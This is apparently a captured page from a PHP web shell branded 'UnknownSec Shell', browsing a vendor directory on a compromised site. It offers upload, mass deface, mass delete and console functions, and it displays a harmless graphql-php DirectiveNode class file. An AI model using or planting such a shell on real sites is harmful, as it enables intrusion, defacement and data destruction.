shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
webonyx
/
graphql-php
/
src
/
Language
/
AST
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
DirectiveNode.php
<?php declare(strict_types=1); namespace GraphQL\Language\AST; class DirectiveNode extends Node { public string $kind = NodeKind::DIRECTIVE; public NameNode $name; /** @var NodeList<ArgumentNode> */ public NodeList $arguments; public function __construct(array $vars) { parent::__construct($vars); $this->arguments ??= new NodeList([]); } }
© 2026 UnknownSec